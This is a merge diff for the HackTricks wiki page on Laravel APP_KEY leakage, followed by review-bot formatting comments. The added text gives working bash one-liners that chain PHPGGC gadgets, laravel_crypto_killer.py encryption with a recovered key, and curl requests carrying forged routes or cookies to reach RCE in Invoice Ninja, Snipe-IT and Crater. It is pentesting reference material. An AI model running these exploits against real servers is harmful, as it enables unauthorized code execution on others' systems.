Merge pull request #1219 from HackTricks-wiki/update_Laravel__APP_KEY_Leakage_Analysis_20250731_124055

Laravel APP_KEY Leakage Analysis
SirBroccoli 2025-08-05 00:01:43 +02:00 committed by GitHub
commit af03f5d540


@ -64,10 +64,30 @@ The script transparently supports both CBC and GCM payloads and re-generates the
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie``laravel_session` cookie | Laravel/RCE15 |
The exploitation workflow is always:
1. Obtain `APP_KEY` (default examples, Git leak, config/.env leak, or brute-force)
2. Generate gadget with **PHPGGC**
3. `laravel_crypto_killer.py encrypt …`
4. Deliver payload through the vulnerable parameter/cookie → **RCE**
1. Obtain or brute-force the 32-byte `APP_KEY`.
2. Build a gadget chain with **PHPGGC** (for example `Laravel/RCE13`, `Laravel/RCE9` or `Laravel/RCE15`).
3. Encrypt the serialized gadget with **laravel_crypto_killer.py** and the recovered `APP_KEY`.
4. Deliver the ciphertext to the vulnerable `decrypt()` sink (route parameter, cookie, session …) to trigger **RCE**.
Below are concise one-liners demonstrating the full attack path for each real-world CVE mentioned above:
```bash
# Invoice Ninja ≤5 /route/{hash}
php8.2 phpggc Laravel/RCE13 system id -b -f | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
xargs -I% curl "https://victim/route/%"
# Snipe-IT ≤6 XSRF-TOKEN cookie
php7.4 phpggc Laravel/RCE9 system id -b | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login
# Crater cookie-based session
php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login
```
---
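Review bot: The Crater table row in the first context line of this hunk has two adjacent code spans, `SESSION_DRIVER=cookie``laravel_session` cookie, with no separator between them, so the cell will not render as two distinct values; suggest `SESSION_DRIVER=cookie` + `laravel_session` cookie (or a comma) so the table reads like the other rows. In the Crater one-liner at the end of the bash block, `--session_cookie=<orig_hash>`, `laravel_session=<orig>` and `<cookie_name>` are three separate placeholders that the surrounding text never defines; a one-line comment above that command stating what each placeholder stands for, or reusing one consistent placeholder name, would make the listing self-explanatory.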
@ -180,7 +200,8 @@ Another deserialization: [https://github.com/ambionics/laravel-exploits](https:/
## References
* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel : analyse de fuite dAPP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
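Review bot: The first two entries in this References hunk, `Laravel: APP_KEY leakage analysis` and `Laravel: APP_KEY leakage analysis (EN)`, link to the same Synacktiv URL; if both survive the merge, one is a duplicate and should be dropped so the list keeps a single (EN) entry beside the (FR) one. The French title is also missing its apostrophe and reads `dAPP_KEY`; it should be `d'APP_KEY` to match the linked page title.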